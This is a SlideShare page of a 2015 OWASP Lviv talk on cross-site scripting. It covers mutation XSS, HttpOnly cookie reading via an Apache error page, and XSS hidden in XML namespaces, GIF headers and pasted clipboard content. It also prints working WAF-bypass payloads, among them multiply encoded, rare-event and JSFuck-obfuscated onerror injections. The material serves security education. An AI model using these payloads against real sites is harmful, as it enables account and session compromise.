SlideShare a Scribd company logo

XSS - Do you know EVERYTHING?

Download as PPTX, PDF
Y
Yurii Bilyk

This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.

Related slideshows

XSS
XSSXSS
XSS
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
1 of 52
Yurii Bilyk | 2015 XSSDO YOU KNOW EVERYTHING?
WHO AM I # root
• WE are Penetration Testing • WE are Security Professionals • WE are OWASP Lviv Chapter • WE are Legio… oops blog: http://owasp-lviv.blogspot.com skype: y.bilyk TEAM
AGENDA - Power of XSS - Read HttpOnly Cookies - XSS via XML and GIF - Clipboard XSS - WAF XSS Bypass
Power of JavaScript Modern WEB (Angular, jQuery) Mobile APPS (PhoneGap) Browser Performance (V8) Server also use (Node.js)
Just only ALERT? Red Alert!!!
What XSS can do? CSRF and ClickJacking XSS Tunnel & Port Scanning Exploit machines & Botnets And other BAD things (BeeF)
• Real payloads: – http://www.xss-payloads.com • BeeF Presentation: – http://t.co/NLHtrxEuZ0 What XSS can do? (Links)
Types of XSS Reflected XSS Stored XSS DOM Based XSS Mutation XSS
Breaking Rules Who cares…
• Two ways to modify DOM: –DOM Direct Manipulation –Using innerHTML innerHtml
<script type ="text / javascript"> var new = "New <b> second </b> text"; function Change () { document.all.myPar.innerHTML = new ; } </script > <p id ="myPar"> First text </p > <a href ="javascript : Change ()"> Change text above ! </a > Example of innerHTML
Mutation XSS (Basics) Web Browsers tolerates wrong HTML syntax It could cause very interesting behavior In some cases “safe” payload could be transformed into XSS injection
Example of HTML mutation <s class ="">hello&#x20;<b>goodbye</b> <S>hello <B>goodbye</B></S> Original Data Mutated data by browser
Example of HTML mutation (JS) <img src ="test.jpg" alt ="``onload=xss()"/> <IMG alt =``onload=xss() src ="test.jpg"> Original Data Mutated data by browser
Mutation XSS (Some Examples) <p style="font-family:'223bx:expression(alert(1))/*'"> <P style="FONT-FAMILY: ; x: expression(alert(1))"></P> Original Data Mutated data by browser
Mutation XSS (Some Examples) <article xmlns="x:img src=x onerror=alert(1)"> <article xmlns="x:img src=x onerror=alert(1)"> <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1)"> </img src=x onerror=alert(1) :article> Original Data Mutated data by browser
Mutation XSS (Links) https://cure53.de/fp170.pdf
E verybody Lies Really, everybody
HttpOnly Ideal World JavaScript CAN’T read HttpOnly Cookies
HttpOnly XSS Apache before 2.2.22 incorrectly processes long cookies Generated error page contains ALL cookies from the request We can cause such error and read response HTML via XSS
HttpOnly XSS
HttpOnly XSS (Exploit) https://goo.gl/kQ1mAo
Trust ME I’am from internet The Phantom Menace
• JS can be run only from HTML? –NO • XML can contain valid JS? –YES So just run JS from XML XSS in XML?
• We can insert HTML tags as CDATA –But this is JUST text in browser view  • We can insert valid XML element and declare (X)HTML namespace for data inside this tag (X)HTML in XML
XML Namespace (Basics) • XML Namespaces provide a method to avoid element name conflicts (for ex. during joining 2 xml documents) <table> <tr> <td>Apples</td> <td>Bananas</td> </tr> </table> <table> <name>Coffee</name> <width>80</width> <length>120</length> </table>
XML Namespace (Conflicts) • Name conflicts in XML can easily be avoided using a name prefix (h: and f:) <h:table> <h:tr> <h:td>Apples</h:td> <h:td>Bananas</h:td> </h:tr> </h:table> <f:table> <f:name>Coffee</f:name> <f:width>80</f:width> <f:length>120</f:length> </f:table>
XSS in XML (Payload) <x:script xmlns:x= "http://www.w3.org/1999/xhtml"> alert(‘XSS'); </x:script>
XSS in XML?
How it Works? Browser’s first decision based on the content type of document XML allows us to define namespace (for. ex. (X)HTML) BINGO! Browser executes part of XML as (X)HTML (like SVG)
Look Deeper It’s obvious, isn’t it?
GIF File Format GIF87a .. ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
XSS GIF File Format GIF87a /* ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
XSS GIF File Format (Final) GIF87a/*)....... GIF87a/*).......*/=0; GIF87a/*).......*/=0; alert(‘XSS’)
XSS in GIF?
How it Works? JavaScript Interpreter works only with ASCII symbols We need to modify some non-printable symbols in the img. header (to create valid JS syntax) Inject JavaScript code into image
Just Copy & Paste It‘s not rocket science!?
Clipboard (Basics) Clipboard operations are not simple memory copy operations Data loaded from the clipboard depends on destination (Notepad) Data stored in the clipboard depends on the source (MS Word)
Clipboard XSS (How?) Edit font style in the document (DOC, ODT, PDF, etc.) Type/Create some text with new font style in this document Copy this text and paste into text area on the victim site
</style><svg><style>svg {position:fixed}</style> <style>svg {top:0}</style><style>svg {left:0}</style> <style>svg {height:10000px}</style> <style>svg {width:10000px}</style> <style>svg {opacity:0}</style> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="4000"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(document.domain)" to="&" /> </a> Clipboard XSS (Filter Bypass)
Clipboard XSS
Clipboard XSS (Links) http://goo.gl/yKgWPy
We’ll save YOU Probably..
WAF (Basics) Most WAF are signature based WAF rules are based on RegExp Black list is used
WAF XSS Bypass (Technics) Mixed Encoding (Double, HTML, URL encoding) Rarely used events of the objects and new HTML5 objects JS-F**K Encoding
WAF XSS Bypass (Payloads) URL Encoding + HTML Encoding + Unicode Encoding %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D %22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B %2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B %2526%2523x27%3B%25 26%2523x29%3B%22%3E <img/src="x"/onerror="promt(‘XSS’);">
WAF XSS Bypass (Payloads) Rare objects events <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here <menu id="xss" onshow="alert(1)">
WAF XSS Bypass (Payloads) JS-F**K Encoding <img/src="x"/onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(! ![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+ (!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]] +[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[] +[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![ ]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[ ])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+ []+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[] )[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[] ]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]] ])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[] )[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()"> <img/src="x"/onerror=“alert(1)">
WAF XSS Bypass (Links) https://goo.gl/hQcPJf
Questions? Fly you fools
XSS - Do you know EVERYTHING?

More Related Content

XSS - Do you know EVERYTHING?

  • 1. Yurii Bilyk | 2015 XSSDO YOU KNOW EVERYTHING?
  • 2. WHO AM I # root
  • 3. • WE are Penetration Testing • WE are Security Professionals • WE are OWASP Lviv Chapter • WE are Legio… oops blog: http://owasp-lviv.blogspot.com skype: y.bilyk TEAM
  • 4. AGENDA - Power of XSS - Read HttpOnly Cookies - XSS via XML and GIF - Clipboard XSS - WAF XSS Bypass
  • 5. Power of JavaScript Modern WEB (Angular, jQuery) Mobile APPS (PhoneGap) Browser Performance (V8) Server also use (Node.js)
  • 7. What XSS can do? CSRF and ClickJacking XSS Tunnel & Port Scanning Exploit machines & Botnets And other BAD things (BeeF)
  • 8. • Real payloads: – http://www.xss-payloads.com • BeeF Presentation: – http://t.co/NLHtrxEuZ0 What XSS can do? (Links)
  • 9. Types of XSS Reflected XSS Stored XSS DOM Based XSS Mutation XSS
  • 11. • Two ways to modify DOM: –DOM Direct Manipulation –Using innerHTML innerHtml
  • 12. <script type ="text / javascript"> var new = "New <b> second </b> text"; function Change () { document.all.myPar.innerHTML = new ; } </script > <p id ="myPar"> First text </p > <a href ="javascript : Change ()"> Change text above ! </a > Example of innerHTML
  • 13. Mutation XSS (Basics) Web Browsers tolerates wrong HTML syntax It could cause very interesting behavior In some cases “safe” payload could be transformed into XSS injection
  • 14. Example of HTML mutation <s class ="">hello&#x20;<b>goodbye</b> <S>hello <B>goodbye</B></S> Original Data Mutated data by browser
  • 15. Example of HTML mutation (JS) <img src ="test.jpg" alt ="``onload=xss()"/> <IMG alt =``onload=xss() src ="test.jpg"> Original Data Mutated data by browser
  • 16. Mutation XSS (Some Examples) <p style="font-family:'223bx:expression(alert(1))/*'"> <P style="FONT-FAMILY: ; x: expression(alert(1))"></P> Original Data Mutated data by browser
  • 17. Mutation XSS (Some Examples) <article xmlns="x:img src=x onerror=alert(1)"> <article xmlns="x:img src=x onerror=alert(1)"> <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1)"> </img src=x onerror=alert(1) :article> Original Data Mutated data by browser
  • 20. HttpOnly Ideal World JavaScript CAN’T read HttpOnly Cookies
  • 21. HttpOnly XSS Apache before 2.2.22 incorrectly processes long cookies Generated error page contains ALL cookies from the request We can cause such error and read response HTML via XSS
  • 24. Trust ME I’am from internet The Phantom Menace
  • 25. • JS can be run only from HTML? –NO • XML can contain valid JS? –YES So just run JS from XML XSS in XML?
  • 26. • We can insert HTML tags as CDATA –But this is JUST text in browser view  • We can insert valid XML element and declare (X)HTML namespace for data inside this tag (X)HTML in XML
  • 27. XML Namespace (Basics) • XML Namespaces provide a method to avoid element name conflicts (for ex. during joining 2 xml documents) <table> <tr> <td>Apples</td> <td>Bananas</td> </tr> </table> <table> <name>Coffee</name> <width>80</width> <length>120</length> </table>
  • 28. XML Namespace (Conflicts) • Name conflicts in XML can easily be avoided using a name prefix (h: and f:) <h:table> <h:tr> <h:td>Apples</h:td> <h:td>Bananas</h:td> </h:tr> </h:table> <f:table> <f:name>Coffee</f:name> <f:width>80</f:width> <f:length>120</f:length> </f:table>
  • 29. XSS in XML (Payload) <x:script xmlns:x= "http://www.w3.org/1999/xhtml"> alert(‘XSS'); </x:script>
  • 31. How it Works? Browser’s first decision based on the content type of document XML allows us to define namespace (for. ex. (X)HTML) BINGO! Browser executes part of XML as (X)HTML (like SVG)
  • 33. GIF File Format GIF87a .. ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
  • 34. XSS GIF File Format GIF87a /* ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
  • 35. XSS GIF File Format (Final) GIF87a/*)....... GIF87a/*).......*/=0; GIF87a/*).......*/=0; alert(‘XSS’)
  • 37. How it Works? JavaScript Interpreter works only with ASCII symbols We need to modify some non-printable symbols in the img. header (to create valid JS syntax) Inject JavaScript code into image
  • 38. Just Copy & Paste It‘s not rocket science!?
  • 39. Clipboard (Basics) Clipboard operations are not simple memory copy operations Data loaded from the clipboard depends on destination (Notepad) Data stored in the clipboard depends on the source (MS Word)
  • 40. Clipboard XSS (How?) Edit font style in the document (DOC, ODT, PDF, etc.) Type/Create some text with new font style in this document Copy this text and paste into text area on the victim site
  • 41. </style><svg><style>svg {position:fixed}</style> <style>svg {top:0}</style><style>svg {left:0}</style> <style>svg {height:10000px}</style> <style>svg {width:10000px}</style> <style>svg {opacity:0}</style> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="4000"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(document.domain)" to="&" /> </a> Clipboard XSS (Filter Bypass)
  • 45. WAF (Basics) Most WAF are signature based WAF rules are based on RegExp Black list is used
  • 46. WAF XSS Bypass (Technics) Mixed Encoding (Double, HTML, URL encoding) Rarely used events of the objects and new HTML5 objects JS-F**K Encoding
  • 47. WAF XSS Bypass (Payloads) URL Encoding + HTML Encoding + Unicode Encoding %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D %22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B %2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B %2526%2523x27%3B%25 26%2523x29%3B%22%3E <img/src="x"/onerror="promt(‘XSS’);">
  • 48. WAF XSS Bypass (Payloads) Rare objects events <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here <menu id="xss" onshow="alert(1)">
  • 49. WAF XSS Bypass (Payloads) JS-F**K Encoding <img/src="x"/onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(! ![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+ (!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]] +[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[] +[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![ ]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[ ])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+ []+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[] )[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[] ]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]] ])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[] )[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()"> <img/src="x"/onerror=“alert(1)">
  • 50. WAF XSS Bypass (Links) https://goo.gl/hQcPJf

Editor's Notes

  1. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  2. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  3. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  4. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  5. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  6. An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other